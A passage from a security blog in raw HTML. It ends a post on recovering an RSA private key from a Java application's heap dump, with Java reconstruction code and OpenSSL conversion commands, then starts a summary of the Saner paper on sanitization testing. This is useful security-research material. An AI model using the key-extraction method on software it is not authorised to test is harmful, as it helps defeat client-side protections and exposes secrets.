<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The next step after extracting the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components was to check if I am able to use them to re-construct the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. So I decided to perform two basic tests before going forward.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Read individual </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> values from the file where </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">int[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">was dumped and match them against values in the MAT</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Check that all </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components are positive numbers</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I wrote some Java code to help me test all the binary dumps against these two conditions. The results indicated that first condition was true for all </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components, but the second condition was not met by 3 out of 8 </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components that had negative values as shown below. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9wsLWZIkz_qQi3lvrX5TIlzfcIpgdAmHVZMV76D0KyASu8dnci0KN1IenRIVu0JeBhhqQOKAbXKt_u2buyoMXGSsK3NK90sg6xCrjwS7daqmKayEP0Hc0DzwoLiYALmr-rCyNu0O3fapW/s1600/individual-ints.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9wsLWZIkz_qQi3lvrX5TIlzfcIpgdAmHVZMV76D0KyASu8dnci0KN1IenRIVu0JeBhhqQOKAbXKt_u2buyoMXGSsK3NK90sg6xCrjwS7daqmKayEP0Hc0DzwoLiYALmr-rCyNu0O3fapW/s400/individual-ints.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;"> Image shows matching integers from the binary dump against MAT (Condition 1)
</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh31p9Gj9Y23UATAT_PoLM8A459voFJc0QOtIvD8RXzRDdaERNFbmCvuaFwBFaNs3s3Cs49m6dRwGxokAh_9381q2tiY6JxK5f6mfgE7hDu94I3kcvime84scQAhyphenhyphenX_Y65LvScN0V1B-S1G/s1600/negative-values.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh31p9Gj9Y23UATAT_PoLM8A459voFJc0QOtIvD8RXzRDdaERNFbmCvuaFwBFaNs3s3Cs49m6dRwGxokAh_9381q2tiY6JxK5f6mfgE7hDu94I3kcvime84scQAhyphenhyphenX_Y65LvScN0V1B-S1G/s400/negative-values.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows the negative value (Condition 2)</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I searched around to identify the reason for the negative values and the comments in the OpenJDK </span><a href="http://hg.openjdk.java.net/jdk6/jdk6/jdk/raw-file/2d585507a41b/src/share/classes/sun/security/rsa/RSAPrivateCrtKeyImpl.java" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">code</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> indicated that the negative values can be result of incorrect ASN.1 encoding. So I included the corresponding code to calculate and return 2’s complement for negative </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> values before supplying the values to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKeySpec </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">constructor.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The final Java code that reads the binary </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BigInteger (int[])</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> components from file system and creates </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PKCS8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> format is provided below.</span><br />
<br />
<br /></div>
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<pre style="font-family:arial;font-size:12px;border:1px dashed #000000;width:99%;height:auto;overflow:auto;background:#d0d0d0;padding:0px;color:#000000;text-align:left;line-height:20px;"><code style="color:#000000;word-wrap:normal;">import java.io.DataInputStream;
import java.io.EOFException;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.math.BigInteger;
import java.nio.ByteBuffer;
import java.nio.IntBuffer;
import java.security.KeyFactory;
import java.security.KeyStoreException;
import java.security.NoSuchAlgorithmException;
import java.security.NoSuchProviderException;
import java.security.PrivateKey;
import java.security.Security;
import java.security.spec.InvalidKeySpecException;
import java.security.spec.PKCS8EncodedKeySpec;
import java.security.spec.RSAPrivateCrtKeySpec;
import java.util.ArrayList;
import org.bouncycastle.jce.provider.BouncyCastleProvider;
public class GenerateKey {
public static BigInteger bitIntFromByteArray(int[] byteArrayParam) {
byte[] localByteArray = new byte[byteArrayParam.length * 4];
ByteBuffer byteBuffer = ByteBuffer.wrap(localByteArray);
IntBuffer intBuffer = byteBuffer.asIntBuffer();
intBuffer.put(byteArrayParam);
BigInteger bigInteger = new BigInteger(localByteArray);
if(bigInteger.compareTo(BigInteger.ZERO) < 0)
bigInteger = new BigInteger(1, bigInteger.toByteArray());
return bigInteger;
}
public static BigInteger bigIntegerFromBinaryFile(String filename) throws IOException {
ArrayList<Integer> intArrayList = new ArrayList<Integer>();
DataInputStream inputStream = new DataInputStream(new FileInputStream(filename));
try {
while (true)
intArrayList.add(inputStream.readInt());
} catch (EOFException ex) {
} finally {
inputStream.close();
}
int[] intArray = new int[intArrayList.size()];
for(int i = 0; i < intArrayList.size(); i++)
intArray[i] = intArrayList.get(i);
return bitIntFromByteArray(intArray);
}
public static void main(String[] args) throws KeyStoreException, NoSuchProviderException, NoSuchAlgorithmException, InvalidKeySpecException, FileNotFoundException, IOException, ClassNotFoundException {
Security.addProvider(new BouncyCastleProvider());
BigInteger crtCoefficient = bigIntegerFromBinaryFile("h:\\key-coeffs\\crtCoefficient");
BigInteger modulus = bigIntegerFromBinaryFile("h:\\key-coeffs\\modulus");
BigInteger primeExponentP = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeExponentP");
BigInteger primeExponentQ = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeExponentQ");
BigInteger primeP = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeP");
BigInteger primeQ = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeQ");
BigInteger privateExponent = bigIntegerFromBinaryFile("h:\\key-coeffs\\privateExponent");
BigInteger publicExponent = bigIntegerFromBinaryFile("h:\\key-coeffs\\publicExponent");
System.out.println("crtCoefficient\t" + crtCoefficient);
System.out.println("modulus\t" + modulus);
System.out.println("primeExponentP\t" + primeExponentP);
System.out.println("primeExponentQ\t" + primeExponentQ);
System.out.println("primeP\t" + primeP);
System.out.println("primeQ\t" + primeQ);
System.out.println("privateExponent\t" + privateExponent);
System.out.println("publicExponent\t" + publicExponent);
RSAPrivateCrtKeySpec spec = new RSAPrivateCrtKeySpec(modulus, publicExponent, privateExponent, primeP, primeQ, primeExponentP, primeExponentQ, crtCoefficient);
KeyFactory factory = KeyFactory.getInstance("RSA", "BC");
PrivateKey privateKey = factory.generatePrivate(spec);
System.out.println(privateKey);
PKCS8EncodedKeySpec pkcs8EncodedKeySpec = new PKCS8EncodedKeySpec(privateKey.getEncoded());
FileOutputStream fos = new FileOutputStream( "h:\\key-coeffs\\private-pkcs8.der");
fos.write(pkcs8EncodedKeySpec.getEncoded());
fos.close();
}
}
</code></pre><br><BR>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Converting PKCS8 to PEM</span></span></h3>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The next step of the process was to convert the private key from </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PKCS8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> format to a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PEM</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file and then to generate the public key from the private key with the following </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">OpenSSL</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> commands.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="638"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="background-color: #d9d9d9; border: 1px solid #000000; padding: 0px 7px 0px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">openssl pkcs8 –inform DER –nocrypt –in private-pkcs8.der –out privatePem.pem</span></div>
<br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">openssl rsa –in privatePem.pem –pubout</span></div>
<br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhEBqqn7VWbNVRU6v12U4I52w1OMGt_8XGrOQLBhb6idhFurAHEzRTbv7IqdL_LDp-12s39T8uvp4slSlGeuoDGN-Z-7pSpITwotDg3tvEdmBYKvtiKxPoR6fu94PHzZDjsDaB3uvm5w4q/s1600/openss-converting-pkcs8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="27" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhEBqqn7VWbNVRU6v12U4I52w1OMGt_8XGrOQLBhb6idhFurAHEzRTbv7IqdL_LDp-12s39T8uvp4slSlGeuoDGN-Z-7pSpITwotDg3tvEdmBYKvtiKxPoR6fu94PHzZDjsDaB3uvm5w4q/s400/openss-converting-pkcs8.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows OpenSSL converting the PKCS8
</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguhk2YZ-S0H_7dvCJv8XH3m6sjEaWy-3C1i15x7jOACA-fQKrf1f2tlDEanXpbZ5u09xSjvA8KolteK_5-BVXCSaRc7hbvIwI6C_07ROlpU-fVRKHTJPCo_Zd_pqRTVd-aI2LKEEDcF5Xn/s1600/rsa-key-extracted.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguhk2YZ-S0H_7dvCJv8XH3m6sjEaWy-3C1i15x7jOACA-fQKrf1f2tlDEanXpbZ5u09xSjvA8KolteK_5-BVXCSaRc7hbvIwI6C_07ROlpU-fVRKHTJPCo_Zd_pqRTVd-aI2LKEEDcF5Xn/s400/rsa-key-extracted.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Image shows the RSA private key
</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEF_UNm6l-HxSihtsEzVtOqWFmUtLU_givYVrezAcvqxV6y1hSE2JHWzprmOpaeQsXF3tpU2TrHa6AZC9ttqrp3Qg13GCjoslwLWikZ_byKaRBSCE4fAv8_E4NjS_X5O9HnFaHufmBAUpV/s1600/public-key-extracted.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEF_UNm6l-HxSihtsEzVtOqWFmUtLU_givYVrezAcvqxV6y1hSE2JHWzprmOpaeQsXF3tpU2TrHa6AZC9ttqrp3Qg13GCjoslwLWikZ_byKaRBSCE4fAv8_E4NjS_X5O9HnFaHufmBAUpV/s400/public-key-extracted.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;"> Image shows OpenSSL extracting public key from the privatePem.pem file</span></td></tr>
</tbody></table>
<h3 style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Conclusion</span></span></h3>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Memory analysis is a powerful technique that can be used to identify and extract sensitive information from application runtime. In some scenarios, the extracted information can also be used to defeat client side security controls.</span></div>
<div>
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com5tag:blogger.com,1999:blog-4663432300421783651.post-20500648779786576292013-09-11T06:00:00.000-07:002013-11-08T12:44:29.617-08:00Validating Custom Sanitization in Web Applications with Saner<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Calibri; font-size: large; font-weight: bold; line-height: 1.1500000000000001; white-space: pre-wrap;">Introduction</span><br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I recently read a </span><a href="http://www.cs.ucsb.edu/~chris/research/doc/oakland08_saner.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">paper</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in which the authors combined static and dynamic source code review techniques to evaluate the effectiveness of custom built data sanitization routines in PHP based web applications. The paper was very interesting and I thought to summarize it for quick consumption.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The authors suggest that static analysis systems are not able to analyze custom sanitization routines and often report security vulnerabilities even when these routines are able to effectively neutralize the malicious characters. These reported vulnerabilities (true or false positives) are typically subjected to manual analysis to identify the effectiveness of the custom code. This process is prone and often leads to inaccurate results with false positives or negatives. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As a part of their research, the authors wrote Saner with the objective to analyze custom sanitization routines to identify XSS and SQL injection vulnerabilities in PHP based web applications. Saner works by combining Static and Dynamic analysis techniques which resulted in low false positive rates and it had the ability to identify the exact attack vectors that could bypass the custom sanitization code. It is based on Pixy; an open source web vulnerability scanner for PHP. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following figure shows the two phases used by Saner.</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWp5KG5gUkqDsdEya5SNu2dlrlYH0xLoZh2JN_vTAdWI7rSLz5ty4VRk5zHvo9AlrR5bbHCVknLzXDgRcLgBNwmKMEHv3I0EKQ3PnaQnNt2NpS3k5Yl9h2yWiaqrr9LshWAlW7ol9hlTjw/s1600/saner-full-flow.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWp5KG5gUkqDsdEya5SNu2dlrlYH0xLoZh2JN_vTAdWI7rSLz5ty4VRk5zHvo9AlrR5bbHCVknLzXDgRcLgBNwmKMEHv3I0EKQ3PnaQnNt2NpS3k5Yl9h2yWiaqrr9LshWAlW7ol9hlTjw/s400/saner-full-flow.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #4f81bd; font-family: Calibri; font-size: 12px; font-weight: bold; line-height: 12px; text-align: left; white-space: pre-wrap;">Figure 1: Image shows the different stages of analysis performed by Saner</span></td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Static Analysis</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There are two types of static analysis models, sound and unsound. The sound model flags custom sanitization routines as ineffective and the unsound model assumes that string manipulation operations on tainted input results in untainted output. The sound model can result in large number of false positives and the unsound model may lead to false negatives.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Pixy provides the data flow analysis between sources and sensitive sinks, identifies if any built in sanitization routines are applied to the identified data flow paths. Pixy follows sound analysis model and it flags custom sanitization routines as ineffective and that results in high false positive rates. Additionally, program variables in Pixy can be either tainted or untainted and Pixy cannot capture the set of values each variable can hold. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To address these shortcomings, Pixy was extended to derive an over-approximation of the values that program variables can hold for every point in the program. It was based on finite state automata to describe an arbitrary set of strings and associating taint qualifiers to the automata transitions. This provided Saner with an ability to track the taint status of different parts of the string.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner performs postorder traversal on Pixy’s dependency graphs to derive the automata that describe the possible string values a program node can contain. The node can be a) a string, b) a variable or c) an operation. When a node represents a string literal, it is decorated with an automaton that describes the exact string. The automaton for program variables is calculated based on the successor nodes from the dependency graph. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Saner categorizes operations in two types of groups. The first group has the functions that are precisely modeled, i.e. Saner is uses finite state transducers to compute an automaton to describer all possible output strings from this category of functions. The Saner team developed a number of finite state transducers for custom string manipulation functions and also the functions that are commonly used for input sanitization. This is required to precisely capture the effect of the sanitization routines. The second group is of un-modeled functions where Saner depends on the values passed to the parameters of these functions and computes the automaton based on least upper bound of the taint status of the supplied parameters.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
